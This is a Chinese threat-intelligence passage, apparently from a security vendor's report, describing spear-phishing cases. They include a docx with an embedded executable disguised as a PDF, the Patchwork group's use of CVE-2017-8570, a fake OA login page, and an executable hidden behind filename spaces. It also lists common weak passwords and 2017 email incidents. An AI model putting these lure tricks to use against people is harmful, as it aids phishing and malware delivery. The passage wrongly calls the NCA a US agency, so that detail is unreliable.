如下是一起在文档中嵌入带毒程序进行鱼叉邮件攻击的案例，其中邮件主题是P.O（Purchase Order采购订单）类，邮件内容大致是请给出附件订单中产品的最优价格，邮件附件名为“P.O# 62826-D.docx”，很多用户在收到此类邮件时，发现发件人使用的是专用的企业邮箱，并且看到该邮件内容、主题以及附件名称，会以为是正常的客户请求，从而打开附件。

通过分析P.O# 62826-D.docx文档，发现文档中既没有利用漏洞也未嵌入宏，而是直接在文档中嵌入PE 恶意文件。打开文档后显示如下所示内容，提示用户双击打开（Please Double Click To Open)，并且该程序伪装成正常的Adobe PDF文件图标，普通用户会以为是正常的文档内容，从而双击打开该程序。

当用户打开时，就会执行恶意程序output4398CD0.exe。但是默认情况下Office会开启安全保护功能，在此种情况下会通知用户风险，用户如果执行运行，恶意PE程序才会被执行。因此，攻击者在利用此类方式进行攻击时，通常会结合社会工程学来欺骗用户点击打开。

另外，需要特别注意的是，部分攻击者为了达到让用点击“运行”按钮的效果，会嵌入多个同样的PE恶意文件，这造成在用户环境执行该文档时，对弹出的安全警告窗口点击“取消”后会继续弹出，一般安全意识较弱的用户在经过多次操作后没有达到预期效果，则会点击“运行”由此来达到关闭安全警告窗口，从而导致中招。

因此，提醒广大用户，Office办公软件发出警告提示时，应特别谨慎，不要轻易选择执行。

第六章 国内鱼叉邮件攻击典型案例一、摩诃草组织的鱼叉邮件攻击

摩诃草组织（APT-C-09），又称HangOver、VICEROY TIGER、The Dropping Elephant、Patchwork，是一个来自于南亚地区的境外APT组织，该组织已持续活跃了8年。摩诃草组织最早由Norman安全公司于2013年曝光，该组织主要针对中国、巴基斯坦等亚洲地区和国家进行网络间谍活动。在针对中国地区的攻击中，该组织主要针对政府机构、科研教育领域进行攻击。

而在2018年春节前后，360安服团队与360威胁情报中心协助某敏感政府机构用户处理了多起非常有针对性的鱼叉邮件攻击事件，发现了客户邮件系统中大量被投递的鱼叉邮件。而经过溯源分析与关联分析，发现发起这些攻击的幕后团伙正是摩诃草组织（APT-C-09）。

2018年春节前后，一些重要的政府机构接连收到一些带有链接的鱼叉邮件，诱导用户点击邮件的链接，并下载打开带漏洞攻击代码的Office文档；一旦用户下载并打开文档，则会触发漏洞并继续下载执行远控木马，这些远控木马感染电脑后，会长期控制用户电脑。

需要特别指出的是：与一般的鱼叉邮件将木马文件作为附件进行直接投递不同，在摩诃草组织的这一轮鱼叉攻击中，攻击者只是在邮件中放入了一个下载链接，诱导用户自己去下载漏洞利用文档，之后再通过漏洞利用文档，来下载远控木马。这种攻击方式使得一般邮件系统中的反病毒引擎完全无法监测到木马的投递过程。

下面就是360威胁情报中心截获的两封摩诃草组织鱼叉邮件内容截图。

用户点击恶意链接后，下载到的Office漏洞利用文档，主要是利用的CVE-2017-8570这个漏洞。该漏洞为一个逻辑漏洞，于2017年7月被微软补丁修复。该漏洞的利用方法相对简单，目前，网上已经出现该漏洞的利用代码，影响范围较广。

从技术上看，CVE-2017-8570是Microsoft Office的一个远程代码执行漏洞。其成因是Microsoft PowerPoint执行时会初始化Script Moniker对象，而在PowerPoint播放动画期间会激活该对象，从而执行sct脚本（Windows Script Component）文件。攻击者可以欺骗用户运行含有该漏洞的PPT文件，导致攻击者可以获取和当前登录用户相同的代码执行权限。

特别值得一提的是摩诃草组织对CVE-2017-8570漏洞的利用速度。

尽管该漏洞被披露后，VirusTotal上发现了多例标注为CVE-2017-8570的Office幻灯片文档恶意样本，也有安全厂商宣称第一时间捕获了最新的Office CVE-2017-8570野外利用漏洞样本。但经过360威胁情报中心的检测发现，这些样本实际上只是微软于2017年4月修复的漏洞CVE-2017-0199的另外一种利用方式而已。

直到2018年1月，360威胁情报中心才首次在互联网上截获真实的CVE-2017-8570野外攻击样本，并对该样本的部分行为进行了披露。而CVE-2017-8570的攻击样本被披露后，马上就被摩诃草组织纳入使用。监测显示，摩诃草组织对该漏洞的利用与360威胁情报中心截获首个野外攻击样本之间，相隔时间仅仅不到一个月。

二、针对某特殊行业工业企业的鱼叉邮件攻击

2017年初，360公司在为国内某特殊行业工业企业部署安全邮件系统时，在其公司内部截获多个APT攻击的鱼叉邮件样本。这些鱼叉邮件样本主要分为两类，一类是仿冒OA钓鱼，一类是带毒邮件附件。

（一）仿冒OA钓鱼

下图是攻击者发送的一封鱼叉邮件截图。在该邮件中，攻击者使用126邮箱，冒充公司信息技术管理员，发送邮件给目标人，声称检测到用户邮箱在意大利异常登录，需要用户点击邮件中的链接，以“验证您的设备”。

用户点开邮件中的链接后，实际上会进入一个服务器设在美国的仿冒该公司官方网站钓鱼网站。用户在该网站上输入帐号和密码后，邮箱帐号和密码就会被窃取。

（二）带毒邮件附件

用户收到的带毒邮件，其附件为针对性极强的诱饵文档，大多是与该公司的技术合作或商务合作相关的文档内容。

下图是360安全专家在该公司邮件系统中截获的一个带毒邮件附件样本。如果将其保存在电脑桌面上，表面上看起来就是一份名为“Technical Points for review.docx”的普通Word文档。但如果点击展开文件的文件名，就会发现，攻击者在文件名中插入了很多的空格，从而利用Windows的文件名显示规则，把真实的文件名后缀“.exe”隐藏了起来

这个诱饵文档实际上并不是一个“纯粹的”Word文档，而是一个由rar生成的自解压程序。如果用户双击打开该诱饵文档，这个自解压程序就会调用rar程序对自己进行解压操作:它一方面会在c:\intel\logs目录下释放木马文件“mobisynce.exe”；另一方面则会在当前目录下，生成一个与自己同名的正常的.docx文件；然后再在偷偷运行木马文件的同时，打开解压出来的正常.docx文档，从而迷惑被攻击的受害者，使受害者以为自己只是打开了一个Word文档。

下图给出了诱饵文档被打开后，Word文件的内容截图。可以看到，文档标题为“XX需要XXX公司确认的技术问题”，正文内容也全部都是与相关“技术问题”有关的内容。这样的邮件，其社工手法显然是经过非常精心设计和策划的，一般人很难识破。

附录1 2017年中国十大电子邮箱弱密码

TOP

弱密码

1

123456

2

9876543210

3

Asdf123456

4

000000

5

hello123

6

123456aaa

7

12345678

8

987654321

9

123321

10

!QAZ2wsx

表1 中国十大电子邮箱弱密码

特别说明，排行第3位的密码“Asdf123456”为键盘基准键“asdf”与“123456”的组合。而排名第10位的“!QAZ2wsx”，虽然看起来有大小写字母，有数字，还有特殊符号，但实际上却是一个键盘左边键的顺序排列。所以，特别提醒，只是简单使用键盘上相近的按键组合而成密码，实际上也大多是弱密码。

附录2 2017年全球十大电子邮件安全事件一、谷歌被令交出国外服务器上的电子邮件

2017年2月，美国法官以调查欺诈案件为由，下令要求谷歌交出存储在国外服务器上的FBI电子邮件。目前谷歌已经提交了美国本土的邮件信息，并提起上诉。

二、雅虎又泄露3200万账户数据

2017年3月，根据雅虎公布的消息显示：在过去两年间，有入侵者进行“cookie伪造”攻击，造成3200万账户泄露。特别要说明的是，此次泄露事件与前几个月爆出的两次大规模数据泄露事件是相互独立的。此前，2016年9月，雅虎被曝5亿账户泄露，同年12月，雅布又被曝10亿账户泄露。

三、黑客以公布电子邮件要挟社会团体

根据Bloomberg的一份新报告表示，FBI和私人安全人士指出，最近几个月，至少有12个美国自由团体被黑客勒索。黑客向这些团体展示已经被盗的电子邮件或云数据，并且威胁要么支付赎金，要么将这些数据公之于众。根据彭博社的消息，赎金数额在30000美元到15万美元之间。

彭博名单中只有两个具名团体遭受威胁：美国进步中心和阿拉贝拉合作伙伴。同时，彭博社的消息来源称，这些攻击中使用的许多技术与以前Cozy Bear小组采用的技术类似，而后者和俄罗斯情报机构有关。

四、黑客在暗网上兜售2000多万个Gmail账户

2017年3月，据外媒报道，大量Gmail（谷歌邮箱）、雅虎账号和PlayStation 网络账号密码在暗网被一位名为“suntzu583”的供应商公开售卖。其中，有近500万个Gmail 账户带有电子邮箱和明文密码；另有2180万个Gmail账号带有电子邮箱及其解密后的密码（75%）或密码的哈希加密值（25%）。

被suntzu583在暗网上同时出售的，还有574万多个雅虎账号。

五、美国两家科技公司被欺诈邮件骗取1亿美元

2017年3月，美国司法部（DOJ）公开了一项针对一名立陶宛网络诈骗者的起诉。据悉，该名诈骗者成功骗过美国两家科技公司让它们向其支付1亿美元。

涉案者是现年48岁的Evaldas Rimasauskas。他伪装成为一名来自知名亚洲硬件制造商的代表成功骗取对方高层信任，然后要求后者向多个银行账号汇款1亿美元。即便这两家公司跟Rimasauskas诈骗所用的亚洲计算机硬件制造商都有合作关系，其重要高层还是会被欺诈邮件骗到。Rimasauskas通过伪造公司信笺、公司发票以及其他能够使对方相信其为该企业代表的官方文件，并进行身份盗用和远程欺诈。

六、Necurs僵尸网络重操旧业发送垃圾邮件

2017年3月，全球最大的僵尸网络之一Necurs开始重新大量对外发送垃圾邮件。Necurs刚开始只针对俄罗斯约会网站和股票网站，后来改变策略，传播各种致命病毒。这个臭名昭著的僵尸网络此前曾通过发送垃圾邮件散布Locky勒索软件。

2016年6月，该僵尸网络突然消失，没了踪影。而最近，Cisco Talos团队发现Necurs网络犯罪分子卷土重来，这次重操旧业，将被感染的设备作为渠道发送垃圾邮件。

七、丹麦称国防部和外交部邮箱遭俄黑客入侵

2017年4月，丹麦国防部情报局所属的网络安全中心发布一份报告称，俄罗斯黑客曾入侵丹麦国防部雇员的电子邮件系统，并在2015年至2016期间访问这些邮箱账户，获取邮件往来信息。这些黑客曾在两年内数千次试图进入丹麦国防部和外交部雇员的电子邮箱账户，并获取了一些非机密的邮件往来信息。这批俄罗斯黑客背后支持者可能是著名的APT28。

丹麦国防大臣弗雷泽里克森表示，这并不是一个小团体黑客的作乐行为，其后是俄罗斯情报机构和政府。弗雷泽里克森还担心这些黑客会攻击丹麦政府的其他部门，他认为形势非常严峻。

八、加拿大贝尔190万个邮箱地址遭黑客窃取

2017年5月，据外媒报道，加拿大电信巨头加拿大贝尔（Bell Canada）于当地时间周三对外披露了一起大规模数据泄露事件，该公司承认黑客入侵其系统，并窃取了190万个用户电子邮件地址以及约1700个活跃用户姓名及电话号码信息。该公司拒绝分享有关被盗信息的更多细节。随后，加拿大皇家骑警网络犯罪部门对这起事件展开了调查。

九、富国银行发错邮件导致5万客户信息泄露

2017年7月，富国银行意外地向一名前理财顾问发送了1.4GB包含5万名高净值客户信息的数据。数据包括姓名、财务信息，以及社会安全号码，报道称，受影响客户的投资资产达到数百亿美元。

十、美国新型税务邮件诈骗来袭

2018年2月，美国国税局（IRS）在发布了一份关于电邮汇款钓鱼骗局的最新版本。在原有骗局攻击流程中，攻击者将伪造邮件发送至各企业执行机构的账户，要求对方将资金电汇至指定账户当中。而国税局方面提醒称，更新版本则要求收件人提供员工的薪资或人力资源资料及其W-2（工资和税收证明）文件。这一轮攻击当中，很多收件人都受到钓鱼活动的欺骗，毫无戒备地提交了所在企业员工的信息。

附录3 第三方电子邮件安全研究成果摘要一、电子邮件欺诈增长2370%

2017年5月初发布的一份FBI公共安全声明描绘出了电子邮件安全的重要性。报告指出，BEC（Business Email Compromise，商业电子邮件泄露）/EAC（Email Account Compromise，邮件帐号泄露）诈骗持续增长进化，中小企业和大型企业皆为其目标。2015年1月到2016年12月的2年间，已确认数据暴露损失增长了2370%。全美50个州和世界131个国家都报告了此类诈骗。互联网犯罪投诉中心（C3）和金融消息源接到的受害者投诉显示，赃款被转账到了103个国家。

二、勒索软件已成最流行的邮件投递恶意程序

2017年8月，根据来自网络安全公司 Cyren、Check Point、卡巴斯基实验室、Proofpoint 和赛门铁克的报告，2017 年第二季度恶意软件活动持续增加。这种情况毫无疑问要归功于以下两个全球性爆发的勒索软件事件 —— WannaCry 和 NotPetya。Proofpoint 还根据恶意邮件中附带的恶意软件类别对恶意邮件威胁进行了细分。再次证明，勒索软件是迄今为止最流行的Payload，紧随其后的是银行木马。就整体邮件威胁来说，在 Cyren 向 Bleeping Computer 提供的报告中显示，检测到的恶意邮件附件增加了 586％，全球通用垃圾邮件增加了 3％。

三、银行木马Ursnif通过垃圾邮件进行传播

2017年10，据IBM X-Force的研究人员透露，从9月开始，网络罪犯分子就开始通过垃圾邮件传播一个臭名昭着的银行木马——Ursnif。在先前的活动中，Ursnif主要针对日本、北美、欧洲和澳大利亚。现在，Ursnif的开发者已经增强了其逃避安全检测的能力，并将目标集中在了日本。针对日本的Ursnif变种将攻击的具体对象设定为本地网络邮件、云存储、加密货币交易平台和电子商务网站的用户凭证

四、全球约1/3大企业CEO的邮箱账户和密码可能遭泄露

2017年11月，根据F-Secure（计算机及网络安全提供商）发布的一份报告（PDF）显示，由于在多个帐户中重复使用相同且较简单的密码，全球约三分之一的大型公司 CEO 的工作邮箱账户和密码可能被盗，连带其家庭住址、公司机密、私人邮件内容等私密信息均遭到曝光。只有少于两成的CEO邮箱账户相对安全。实际上，电子邮箱帐户对网络犯罪分子来说非常有吸引力，因为它通常都包含一些敏感信息。

研究人员根据泄露的凭据数据库检测了200位CEO们的邮箱地址，结果现实，技术公司的易曝光指数从30％上升到63％。同时他们还发现，超过七成的 CEO 连接公司邮箱地址的最高级别服务器大都为LinkedIn、Dropbox和专业网站。

五、邮件地址解析漏洞影响全球33家邮件服务商

2017年12月，德国安全研究人员Sabri Haddouche发现了一系列新的系统漏洞，他统称其为Mailsploit，该漏洞至少影响33个邮件客户端和Web服务运营商。

这些漏洞允许攻击者欺骗电子邮件身份，并在某些情况下，在用户的计算机上运行恶意代码。虽然，Mailsploit的远程代码执行部分是令人担忧。但真正的问题是电子邮件欺骗攻击，它绕过了几乎所有现代反欺骗保护机制，如DMARC（DKIM / SPF）或各种垃圾邮件过滤器。这使得攻击者能够发送具有欺骗性身份的电子邮件，使得用户和电子邮件服务器很难检测出其实质上是假冒的，这反过来又使得钓鱼攻击和恶意软件邮件更加难以被发现。

六、两种模拟钓鱼攻击的点击率接近100%

2018年2月，Wombat也发布了企业年度钓鱼统计报告，从这份报告中我们可以清晰地看到不同地区企业间的差异。报告显示，针对性的钓鱼攻击不再比普通钓鱼攻击更具备影响力；用户更倾向向上于汇报可疑邮件。

研究显示：对用户最具诱惑力的邮件主题是：在线购物的安全更新，来自未知来电者的企业语音呼叫，企业邮箱更新。有两种模拟钓鱼攻击的点击率接近100%：数据库密码重置警告，最新建筑物疏散计划。同时，也有四种类别的钓鱼攻击平均点击率显著下降，分别是企业钓鱼、商业钓鱼、云钓鱼以及消费者钓鱼。

七、全球过半互联网邮件服务器受严重漏洞影响

2018年2月，台湾研究员 Meh Chang向邮件传输代理软件 Exim的研发团队报告了一个漏洞，攻击者可以利用该漏洞，诱骗 Exim 邮件服务器在完成验证之前运行恶意代码。

根据2017年3月发布的一项调查显示，56%的邮件服务器上运行着 Exim，而当时网上的邮件服务器超过56万台。而2018年初发布的相关研究报告，则将这个数字增加到数百万台。

附录4 各国最新电子邮件安全政策参考摘要一、美国众议院通过对电子邮件新的隐私保护法案

2017年2月，美国众议院表决通过了新的电子邮件隐私法案，该法案将允许执法机构获得法院命令的权证，以搜索超过六个月的电子邮件和第三方存储的其他数据。该法案随后送交参议院审议。

二、美国国家犯罪局(NCA)力推DMARC协议

美国国家犯罪局（NCA）国家CyberCrime部门技术主管Paul Edmunds说，采取“主动防御”技术将对很多低级别网络犯罪活动产生“重大影响”。阻止这些低级别网络犯罪的手段之一就是使用DMARC以及电子邮件认证协议，如果DMARC在全球各地推出，以验证消息是否来自合法域名，这将是垃圾邮件分销商的重大打击。这将是向保护组织免受此类犯罪迈出了重要的一步。但目前DMARC并没有得到广泛部署。

三、美DHS发布新规强化Web安全和邮件安全

2017年10月，美国国土安全部（DHS）发布《约束性操作指令18-01》（BOD 18-01），要求联邦机构使用新的电子邮件和Web安全指南以避免中间人攻击。按照指令要求，联邦机构须在90天内应用两项协议：DMARC和STARTTLS。这项指令还要求联邦机构120天内在所有公开访问的联邦网站上启用HTTPS和HSTS安全连接。这样做可能会潜在消除影响大多数联邦政府网站的众多安全漏洞。